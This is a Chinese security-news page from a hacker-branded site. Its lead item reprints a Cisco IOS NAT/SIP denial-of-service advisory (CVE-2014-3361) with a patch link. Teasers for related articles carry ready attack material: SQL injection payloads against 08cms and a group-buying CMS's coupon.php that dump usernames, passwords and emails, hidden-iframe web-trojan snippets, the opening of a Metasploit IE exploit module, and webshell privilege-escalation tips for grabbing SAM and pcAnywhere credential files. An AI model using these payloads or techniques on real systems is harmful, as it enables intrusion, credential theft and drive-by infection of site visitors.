Cisco IOS拒绝服务漏洞 -中国寒龙出品

受影响系统：
Cisco IOS 15.x
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 70129
CVE(CAN) ID: CVE-2014-3361

Cisco IOS是多数思科系统路由器和网络交换机上使用的互联网络操作系统。

Cisco IOS 15.0, 15.1, 15.2, 15.4没有正确通过NAT实现SIP，在实现上存在远程拒绝服务漏洞，攻击者通过多部分的 SDP IPv4数据流利用此漏洞可造成受影响设备重载。

<*来源：Cisco

链接：http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-nat
*>

建议：
--------------------------------------------------------------------------------
厂商补丁：

Cisco
-----
Cisco已经为此发布了一个安全公告（cisco-sa-20140924-nat）以及相应补丁:
cisco-sa-20140924-nat：Cisco IOS Software Network Address Translation Denial of Service Vulnerability
链接：http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-nat

时间： 2024-10-13 16:54:32

Cisco IOS拒绝服务漏洞 -中国寒龙出品的相关文章

Cisco IOS及IOS XE Software DHCPv6拒绝服务漏洞 -中国寒龙出品

受影响系统:Cisco IOS 15.xCisco IOS XE 3.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 70140CVE(CAN) ID: CVE-2014-3359 Cisco IOS是多数思科系统路由器和网络交换机上使用的互联网络操作系统. Cisco IOS 15.0, 15.1, 15.2, 15.4.IOS XE 3.3.xSE,

Cisco IOS及IOS XE Software多个DNS拒绝服务漏洞 -中国寒龙

受影响系统:Cisco IOS 15.xCisco IOS XE 3.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 70132CVE(CAN) ID: CVE-2014-3357 Cisco IOS是多数思科系统路由器和网络交换机上使用的互联网络操作系统. Cisco IOS 15.0, 15.1, 15.2, 15.4.IOS XE 3.3.xSE,

Juniper JunosE拒绝服务漏洞 -中国寒龙

受影响系统:Juniper Networks JUNOSe描述:--------------------------------------------------------------------------------BUGTRAQ ID: 70369CVE(CAN) ID: CVE-2014-6380 JunosE是用在Juniper E系列路由器内的操作系统. Juniper JunosE处理构造的碎片数据包时存在拒绝服务漏洞,可导致FPC重置或断网. <*来源:vendor*> 建

08cms家园系统源码注入漏洞 -中国寒龙出品

# Title :08cms家园系统注入漏洞# Team :08 Security Team# Author :08安全团队# 首发 : 08安全团队#######################################这个漏洞在5月份已经审计出来了,现在将漏洞放出来.注册一个账号会员资料->基本资料查看表单得到自己的 MID在真实姓名填写 \头像填写 1 ,company=(SELECT CONCAT(mname,0x7c,PASSWORD) FROM cms_members l

网页挂马大全集 -中国寒龙出品转载写明出处www.hackerschina.org

一:框架挂马<iframe src=地址 width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js,则JS挂马代码为<script language=javascript src=xxx.js></script>三:js变形加密<SCR

中国寒龙出品-Windows IE浏览器OLE自动化阵远程执行代码漏洞

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/powershell' class Metasploit4 < Msf::Exploit::Remote Rank = Excellen

中国寒龙出品 -最土团购系统通用SQL注入漏洞 WWW.HACKERSCHINA.ORG

基础函数过滤不全导致注射. ajax/coupon.php exp: 1 ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,password,0x3a,email,0x3a),8,9,10,11,9999999999,13,14,15,16/**/from/**/user/**/wher

webshell提权技巧 -中国寒龙出品关注网络安全

web)权限终极9技巧当我们取得一个webshell时候,下一部要做的就是提升权限个人总结如下:1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆2.C:\WINNT\system32\config\进这里下它的SAM,破解用户的密码用到破解sam密码的软件有LC,SAMinside3.C:\Doc

TYPO3 JobControl SQL注入及跨站脚本漏洞 -中国寒龙

受影响系统:TYPO3 JobControl描述:--------------------------------------------------------------------------------BUGTRAQ ID: 70145CVE(CAN) ID: CVE-2014-5324 Typo3是开源内容管理系统(CMS)和内容管理框架(CMF). TYPO3 JobControl 2.14.0版本及之前版本在实现上存在SQL注入及跨站脚本漏洞,攻击者可利用此漏洞窃取cookie身份